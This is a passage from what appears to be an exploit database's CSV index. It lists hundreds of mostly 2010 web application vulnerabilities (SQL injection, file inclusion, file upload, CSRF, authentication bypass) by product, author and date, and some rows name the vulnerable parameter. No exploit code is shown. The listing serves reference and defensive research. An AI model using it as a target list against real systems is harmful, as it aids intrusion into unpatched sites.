Injection",2010-06-09,Sid3^effects,asp,webapps, -14333,exploits/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps, -13792,exploits/php/webapps/13792.txt,"Joomla! Component cinema - SQL Injection",2010-06-09,Sudden_death,php,webapps, -13793,exploits/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps, -13794,exploits/multiple/webapps/13794.txt,"Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps, -27972,exploits/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,php,webapps, -27973,exploits/php/webapps/27973.txt,"Bookmark4U 2.0 - '/inc/dbase.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps, -27974,exploits/php/webapps/27974.txt,"Bookmark4U 2.0 - '/inc/config.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps, -13796,exploits/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,php,webapps, -13797,exploits/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,php,webapps, -13798,exploits/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,php,webapps, -13799,exploits/php/webapps/13799.txt,"Joomla! Component com_jmarket - SQL Injection",2010-06-09,Sid3^effects,php,webapps, -13800,exploits/php/webapps/13800.txt,"Joomla! Component com_jsubscription - SQL Injection",2010-06-09,Sid3^effects,php,webapps, -13801,exploits/php/webapps/13801.txt,"Science Fair In A Box - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps, -13802,exploits/php/webapps/13802.txt,"PHP Real Estate Script - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps, -13803,exploits/php/webapps/13803.txt,"PHPAccess - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps, -13804,exploits/php/webapps/13804.txt,"Joomla! Component com_jnewsletter - SQL Injection",2010-06-09,Sid3^effects,php,webapps, -13805,exploits/php/webapps/13805.txt,"PHP Property Rental Script - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps, -13807,exploits/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - SQL Injection",2010-06-09,TinKode,php,webapps, -13810,exploits/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,php,webapps, -13812,exploits/php/webapps/13812.txt,"SchoolMation 2.3 - SQL Injection / Cross-Site Scripting",2010-06-10,Sid3^effects,php,webapps, -13813,exploits/php/webapps/13813.html,"Store Locator - Cross-Site Request Forgery (Add Admin)",2010-06-10,JaMbA,php,webapps, -13814,exploits/asp/webapps/13814.txt,"Pars Design CMS - Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps, -13815,exploits/asp/webapps/13815.pl,"Netvolution CMS 2.x - SQL Injection Script",2010-06-10,"amquen & krumel",asp,webapps, -13816,exploits/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection",2010-06-10,"L0rd CrusAd3r",php,webapps, -13819,exploits/php/webapps/13819.txt,"E-PHP B2B Marketplace - Multiple Vulnerabilities",2010-06-11,MizoZ,php,webapps, -13826,exploits/php/webapps/13826.txt,"Site for Real Estate - Brokers SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps, -13827,exploits/php/webapps/13827.txt,"Development Site Professional Liberal - Company Institutional SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps, -13829,exploits/php/webapps/13829.txt,"Site to Store Automobile - Motorcycle Boat SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps, -13830,exploits/php/webapps/13830.txt,"DaLogin - Multiple Vulnerabilities",2010-06-11,hc0,php,webapps, -13831,exploits/php/webapps/13831.txt,"Full Site for Restaurant - SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps, -13832,exploits/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion",2010-06-11,cr4wl3r,php,webapps, -13833,exploits/php/webapps/13833.txt,"Parallels System Automation (PSA) - Local File Inclusion",2010-06-11,"Pouya Daneshmand",php,webapps, -13835,exploits/php/webapps/13835.txt,"DaLogin 2.2 - 'FCKeditor' Arbitrary File Upload",2010-06-11,eidelweiss,php,webapps, -13840,exploits/asp/webapps/13840.txt,"VU Case Manager - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps, -13841,exploits/asp/webapps/13841.txt,"VU Mass Mailer - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps, -13842,exploits/asp/webapps/13842.txt,"VU Web Visitor Analyst - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps, -13843,exploits/asp/webapps/13843.txt,"BrightSuite Groupware - SQL Injection",2010-06-12,"L0rd CrusAd3r",asp,webapps, -13844,exploits/php/webapps/13844.pl,"Collabtive 0.6.3 - Multiple Vulnerabilities",2010-06-12,DNX,php,webapps, -13845,exploits/php/webapps/13845.txt,"Yamamah - 'news' SQL Injection / Source Code Disclosure",2010-06-12,anT!-Tr0J4n,php,webapps, -13846,exploits/asp/webapps/13846.txt,"BDSMIS TraX with Payroll - SQL Injection",2010-06-12,"L0rd CrusAd3r",asp,webapps, -13847,exploits/php/webapps/13847.txt,"phpplanner - Cross-Site Scripting / SQL Injection",2010-06-12,anT!-Tr0J4n,php,webapps, -13848,exploits/php/webapps/13848.txt,"Infront - SQL Injection",2010-06-12,TheMaStEr,php,webapps, -13849,exploits/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,php,webapps, -13852,exploits/php/webapps/13852.txt,"PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities",2010-06-13,cp77fk4r,php,webapps, -13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",php,webapps, -13855,exploits/php/webapps/13855.txt,"Eyeland Studio Inc. - SQL Injection",2010-06-13,Mr.P3rfekT,php,webapps, -13856,exploits/php/webapps/13856.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure",2010-06-13,mat,php,webapps, -13857,exploits/php/webapps/13857.txt,"Yamamah Photo Gallery 1.00 - 'calbums' SQL Injection",2010-06-13,CoBRa_21,php,webapps, -13858,exploits/php/webapps/13858.txt,"Eyeland Studio Inc. - 'game.php' SQL Injection",2010-06-13,CoBRa_21,php,webapps, -13859,exploits/asp/webapps/13859.txt,"Digital Interchange Document Library - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps, -13860,exploits/asp/webapps/13860.txt,"Digital Interchange Calendar - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps, -13861,exploits/asp/webapps/13861.txt,"Real-time ASP Calendar - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps, -13862,exploits/php/webapps/13862.txt,"Pre Classified Listing - SQL Injection",2010-06-13,"L0rd CrusAd3r",php,webapps, -13863,exploits/php/webapps/13863.txt,"Lyrics Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,php,webapps, -13864,exploits/php/webapps/13864.txt,"Membership Site Script - SQL Injection",2010-06-14,Valentin,php,webapps, -13865,exploits/php/webapps/13865.txt,"Daily Inspirational Quotes Script - SQL Injection",2010-06-14,Valentin,php,webapps, -13866,exploits/php/webapps/13866.txt,"Joke Website Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,php,webapps, -13867,exploits/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,php,webapps, -13880,exploits/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps, -13881,exploits/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps, -13882,exploits/asp/webapps/13882.txt,"SAS Hotel Management System - 'notfound' SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps, -13883,exploits/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps, -13884,exploits/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps, -13885,exploits/asp/webapps/13885.txt,"Acuity CMS 2.7.1 - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps, -13886,exploits/asp/webapps/13886.txt,"IISWorks FileMan - fileman.mdb Remote User Database Disclosure",2010-06-15,j0fer,asp,webapps, -13889,exploits/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion",2010-06-16,sh00t0ut,php,webapps, -13890,exploits/php/webapps/13890.txt,"EZPX Photoblog 1.2 Beta - Remote File Inclusion",2010-06-16,sh00t0ut,php,webapps, -13891,exploits/asp/webapps/13891.html,"AspTR EXtended - Cross-Site Request Forgery",2010-06-16,FreWaL,asp,webapps, -13892,exploits/php/webapps/13892.txt,"PHPAuctionSystem - Arbitrary File Upload",2010-06-16,Sid3^effects,php,webapps, -13893,exploits/php/webapps/13893.txt,"Nakid CMS 0.5.2 - 'FCKeditor' Arbitrary File Upload",2010-06-16,eidelweiss,php,webapps, -13894,exploits/php/webapps/13894.txt,"2DayBiz Online Classified System - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps, -13897,exploits/php/webapps/13897.txt,"Real Estate - SQL Injection",2010-06-16,"L0rd CrusAd3r",php,webapps, -13898,exploits/php/webapps/13898.pl,"DMSEasy 0.9.7 - 'FCKeditor' Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps, -13899,exploits/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Inclusion",2010-06-17,sh00t0ut,php,webapps, -13900,exploits/php/webapps/13900.txt,"Easy Travel Portal - SQL Injection",2010-06-17,"L0rd CrusAd3r",php,webapps, -13901,exploits/php/webapps/13901.txt,"PenPals - Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps, -13902,exploits/asp/webapps/13902.txt,"Ananda Image Gallery - SQL Injection",2010-06-17,"L0rd CrusAd3r",asp,webapps, -13904,exploits/php/webapps/13904.txt,"Planet 1.1 - Cross-Site Request Forgery (Add Admin)",2010-06-17,G0D-F4Th3r,php,webapps, -13911,exploits/php/webapps/13911.txt,"Live CMS - SQL Injection",2010-06-17,ahwak2000,php,webapps, -13912,exploits/php/webapps/13912.txt,"Havij 1.10 - Persistent Cross-Site Scripting",2010-06-17,hexon,php,webapps, -13916,exploits/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - 'print&sid' SQL Injection",2010-06-17,Gamoscu,php,webapps, -13918,exploits/multiple/webapps/13918.txt,"Spring Framework - Arbitrary code Execution",2010-06-18,"Meder Kydyraliev",multiple,webapps, -13922,exploits/php/webapps/13922.txt,"Joomla! Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps, -13923,exploits/php/webapps/13923.txt,"Joomla! Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps, -13925,exploits/php/webapps/13925.txt,"Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps, -13926,exploits/php/webapps/13926.txt,"Joomla! Component com_listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps, -13927,exploits/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,php,webapps, -13929,exploits/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps, -13930,exploits/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps, -13931,exploits/php/webapps/13931.txt,"KubeLance 1.7.6 - 'profile.php' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps, -13933,exploits/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps, -13935,exploits/php/webapps/13935.txt,"Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps, -13936,exploits/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - 'ladder[id]' SQL Injection",2010-06-19,ahwak2000,php,webapps, -13937,exploits/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection",2010-06-19,ahwak2000,php,webapps, -13938,exploits/php/webapps/13938.html,"WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)",2010-06-19,"Luis Santana",php,webapps, -14848,exploits/php/webapps/14848.txt,"Web-Ideas Web Shop Standard - SQL Injection",2010-08-31,Ariko-Security,php,webapps, -13944,exploits/php/webapps/13944.txt,"SimpleAssets - Authentication Bypass / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps, -13945,exploits/php/webapps/13945.txt,"iBoutique - 'page' SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps, -13946,exploits/php/webapps/13946.txt,"Overstock Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps, -13947,exploits/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps, -13948,exploits/php/webapps/13948.txt,"OroHYIP - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps, -13949,exploits/php/webapps/13949.txt,"Shareasale Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps, -13951,exploits/php/webapps/13951.txt,"Joomla! Component com_eportfolio - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps, -13952,exploits/php/webapps/13952.txt,"Saffa Tunes CMS - 'news.php' SQL Injection",2010-06-21,"Th3 RDX",php,webapps, -13954,exploits/php/webapps/13954.txt,"G.CMS Generator - SQL Injection",2010-06-21,Sid3^effects,php,webapps, -13955,exploits/php/webapps/13955.txt,"Joomla! Component com_community - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps, -13956,exploits/php/webapps/13956.txt,"Joomla! Component com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps, -13957,exploits/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,ALTBTA,php,webapps, -14363,exploits/php/webapps/14363.txt,"Ad Network Script - Persistent Cross-Site Scripting",2010-07-14,Sid3^effects,php,webapps, -14359,exploits/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,php,webapps, -13960,exploits/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery",2010-06-21,"Jeremiah Talamantes",php,webapps, -13961,exploits/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection",2010-06-21,"Th3 RDX",php,webapps, -13962,exploits/php/webapps/13962.txt,"Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting Vulnerabilities",2010-06-21,jdc,php,webapps, -13964,exploits/php/webapps/13964.txt,"Linker IMG 1.0 - Remote File Inclusion",2010-06-21,"Sn!pEr.S!Te Hacker",php,webapps, -13966,exploits/php/webapps/13966.txt,"The Uploader 2.0.4 - Remote File Disclosure",2010-06-22,Xa7m3d,php,webapps, -13967,exploits/php/webapps/13967.txt,"Online Classified System Script - SQL Injection / Cross-Site Scripting",2010-06-22,"L0rd CrusAd3r",php,webapps, -13969,exploits/php/webapps/13969.txt,"Job Search Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps, -13970,exploits/php/webapps/13970.txt,"Video Community portal - SQL Injection / Cross-Site Scripting",2010-06-22,"L0rd CrusAd3r",php,webapps, -13971,exploits/php/webapps/13971.txt,"Classifieds Script - 'rate' SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps, -13973,exploits/php/webapps/13973.txt,"Hot or Not Picture Rating Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps, -13975,exploits/php/webapps/13975.txt,"Webring Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps, -13976,exploits/php/webapps/13976.txt,"Top Sites Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps, -13977,exploits/php/webapps/13977.txt,"Social Community Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps, -13978,exploits/php/webapps/13978.txt,"Job Search Engine Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps, -13979,exploits/php/webapps/13979.txt,"Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection",2010-06-22,v3n0m,php,webapps, -13980,exploits/php/webapps/13980.txt,"Cornerstone CMS - SQL Injection",2010-06-22,"Th3 RDX",php,webapps, -13981,exploits/php/webapps/13981.txt,"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps, -13982,exploits/php/webapps/13982.txt,"Alpin CMS - 'e4700.asp?id' SQL Injection",2010-06-22,CoBRa_21,php,webapps, -13983,exploits/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,php,webapps, -13986,exploits/php/webapps/13986.txt,"Softbiz Resource Repository Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps, -13987,exploits/php/webapps/13987.txt,"PreProject Multi-Vendor Shopping Malls - SQL Injection",2010-06-22,Sangteamtham,php,webapps, -13988,exploits/php/webapps/13988.txt,"PHP Event Calendar 1.5 - Multiple Vulnerabilities",2010-06-22,cp77fk4r,php,webapps, -13990,exploits/asp/webapps/13990.txt,"Boat Classifieds - SQL Injection",2010-06-22,Sangteamtham,asp,webapps, -13991,exploits/php/webapps/13991.txt,"Softbiz PHP FAQ Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps, -13992,exploits/php/webapps/13992.txt,"Pre PHP Classifieds - SQL Injection",2010-06-22,Sangteamtham,php,webapps, -13993,exploits/php/webapps/13993.txt,"K-Search - SQL Injection / Cross-Site Scripting",2010-06-22,Sangteamtham,php,webapps, -14512,exploits/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,php,webapps, -13995,exploits/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps, -13996,exploits/php/webapps/13996.txt,"PreProject Multi-Vendor Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps, -13997,exploits/php/webapps/13997.txt,"Joomla! Component JE Ajax Event Calendar 1.0.5 - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps, -13999,exploits/php/webapps/13999.html,"Software Index - Arbitrary File Upload",2010-06-23,indoushka,php,webapps, -14000,exploits/php/webapps/14000.txt,"PishBini Footbal - Cross-Site Scripting / SQL Injection",2010-06-23,indoushka,php,webapps, -14001,exploits/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps, -14004,exploits/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps, -14005,exploits/php/webapps/14005.txt,"2DayBiz MLM Script - SQL Injection",2010-06-23,JaMbA,php,webapps, -14007,exploits/php/webapps/14007.txt,"Custom Business Card script - SQL Injection",2010-06-23,JaMbA,php,webapps, -14008,exploits/php/webapps/14008.txt,"2DayBiz Matrimonial Script - SQL Injection",2010-06-23,JaMbA,php,webapps, -14009,exploits/php/webapps/14009.txt,"2DayBiz Freelance Script - SQL Injection",2010-06-23,JaMbA,php,webapps, -14011,exploits/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",php,webapps, -14015,exploits/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps, -14016,exploits/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - 'init.php' Remote File Inclusion",2010-06-24,v3n0m,php,webapps, -14017,exploits/php/webapps/14017.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2)",2010-06-24,MISTERFRIBO,php,webapps, -14018,exploits/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps, -14019,exploits/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps, -14020,exploits/php/webapps/14020.txt,"2DayBiz The Web Template Software - SQL Injection / Cross-Site Scripting",2010-06-24,Sangteamtham,php,webapps, -14026,exploits/php/webapps/14026.txt,"AbleDating script - SQL Injection",2010-06-24,JaMbA,php,webapps, -14027,exploits/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps, -14028,exploits/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection",2010-06-24,JaMbA,php,webapps, -14030,exploits/asp/webapps/14030.pl,"PHPortal 1.2 - 'gunaysoft.php' Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps, -14033,exploits/php/webapps/14033.txt,"Big Forum 5.2 - Arbitrary File Upload / Local File Inclusion",2010-06-24,"Zer0 Thunder",php,webapps, -14035,exploits/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps, -14047,exploits/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps, -14048,exploits/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps, -14049,exploits/php/webapps/14049.html,"Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps, -14050,exploits/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",php,webapps, -14051,exploits/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps, -14053,exploits/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps, -14054,exploits/php/webapps/14054.txt,"Joomla! Component jesubmit 1.4 - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps, -14055,exploits/php/webapps/14055.txt,"Joomla! Component com_sef - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps, -14056,exploits/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps, -14057,exploits/php/webapps/14057.txt,"WordPress Plugin Cimy Counter - Full Path Disclosure / Redirector / Cross-Site Scripting / HTTP Response Spitting",2010-06-26,sebug,php,webapps, -14058,exploits/aix/webapps/14058.html,"PHP-Nuke 8.2 - Arbitrary File Upload",2010-06-26,Net.Edit0r,aix,webapps, -14059,exploits/php/webapps/14059.txt,"Joomla! Component JE Awd Song - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps, -14060,exploits/php/webapps/14060.txt,"Joomla! Component JE Media Player - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps, -14085,exploits/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,php,webapps, -14086,exploits/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,php,webapps, -14062,exploits/php/webapps/14062.txt,"Joomla! Component jeeventcalendar - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps, -14063,exploits/php/webapps/14063.txt,"Joomla! Component com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps, -14064,exploits/php/webapps/14064.txt,"Joomla! Component jesectionfinder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps, -14073,exploits/php/webapps/14073.txt,"2DayBiz Matrimonial Script - 'smartresult.php' SQL Injection",2010-06-27,"Easy Laster",php,webapps, -14070,exploits/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps, -14074,exploits/php/webapps/14074.rb,"2DayBiz ybiz Polls Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps, -14075,exploits/php/webapps/14075.rb,"2DayBiz ybiz Freelance Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps, -14076,exploits/php/webapps/14076.rb,"2DayBiz Photo Sharing Script - SQL Injection (2)",2010-06-27,"Easy Laster",php,webapps, -14078,exploits/php/webapps/14078.txt,"Bilder Upload Script Datei Upload 1.09 - Arbitrary File Upload",2010-06-27,Mr.Benladen,php,webapps, -14079,exploits/php/webapps/14079.txt,"i-netsolution Job Search Engine - SQL Injection",2010-06-27,Sid3^effects,php,webapps, -14080,exploits/php/webapps/14080.txt,"I-Net MLM Script Engine - SQL Injection",2010-06-27,Sid3^effects,php,webapps, -14084,exploits/php/webapps/14084.txt,"Swoopo Clone 2010 - SQL Injection",2010-06-27,"L0rd CrusAd3r",php,webapps, -14089,exploits/php/webapps/14089.txt,"PageDirector CMS - Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps, -14094,exploits/php/webapps/14094.txt,"Netartmedia iBoutique.MALL - SQL Injection",2010-06-28,Sid3^effects,php,webapps, -14095,exploits/php/webapps/14095.txt,"I-net Multi User Email Script - SQL Injection",2010-06-28,Sid3^effects,php,webapps, -14096,exploits/php/webapps/14096.html,"CMSQLite / CMySQLite 1.3 - Cross-Site Request Forgery",2010-06-28,"ADEO Security",php,webapps, -14106,exploits/php/webapps/14106.txt,"PHPDirector 0.30 - 'videos.php' SQL Injection",2010-06-29,Mr-AbdoX,php,webapps, -14107,exploits/php/webapps/14107.txt,"YPNinc JokeScript - 'ypncat_id' SQL Injection",2010-06-29,v3n0m,php,webapps, -14104,exploits/multiple/webapps/14104.txt,"Ecomat CMS - SQL Injection",2010-06-29,"High-Tech Bridge SA",multiple,webapps, -14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,multiple,webapps,80 -14103,exploits/multiple/webapps/14103.txt,"Applicure dotDefender 4.01-3 - Persistent Cross-Site Scripting",2010-06-28,EnableSecurity,multiple,webapps,80 -14109,exploits/php/webapps/14109.txt,"YPNinc PHP Realty Script - 'docID' SQL Injection",2010-06-29,v3n0m,php,webapps, -14110,exploits/php/webapps/14110.txt,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) (1)",2010-06-29,G0D-F4Th3r,php,webapps, -14111,exploits/php/webapps/14111.txt,"Allomani Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps, -14112,exploits/php/webapps/14112.txt,"PageDirector CMS - 'result.php' SQL Injection",2010-06-29,v3n0m,php,webapps, -14115,exploits/windows/webapps/14115.txt,"Gekko CMS - SQL Injection",2010-06-29,[]0iZy5,windows,webapps,80 -14117,exploits/multiple/webapps/14117.txt,"CubeCart PHP 4.3.x - 'shipkey' SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 -14118,exploits/multiple/webapps/14118.txt,"LIOOSYS CMS - 'news.php' SQL Injection",2010-06-29,GlaDiaT0R,multiple,webapps,80 -14274,exploits/php/webapps/14274.txt,"Joomla! Component Music Manager - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps, -14123,exploits/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX & Cr3W-DZ",php,webapps, -14124,exploits/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps, -14125,exploits/php/webapps/14125.pl,"ShopCartDx 4.30 - 'products.php' Blind SQL Injection",2010-06-30,Dante90,php,webapps, -14126,exploits/php/webapps/14126.txt,"Joomla! Component Gamesbox 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps, -14127,exploits/php/webapps/14127.txt,"Joomla! Component Joomanager - SQL Injection",2010-06-30,Sid3^effects,php,webapps, -14141,exploits/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,php,webapps, -14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps, -14144,exploits/php/webapps/14144.txt,"Specialist Bed and Breakfast Website - SQL Injection",2010-06-30,JaMbA,php,webapps, -14145,exploits/php/webapps/14145.txt,"Golf Club Site - SQL Injection",2010-06-30,JaMbA,php,webapps, -14146,exploits/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution",2010-06-30,emgent,hardware,webapps,80 -14147,exploits/php/webapps/14147.txt,"NinkoBB - Cross-Site Request Forgery",2010-07-01,"ADEO Security",php,webapps, -14149,exploits/asp/webapps/14149.txt,"Setiran CMS - Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps, -14151,exploits/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - 'post.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps, -14152,exploits/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - 'forumdisplay.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps, -14154,exploits/php/webapps/14154.txt,"Joomla! Component com_dateconverter 0.1 - SQL 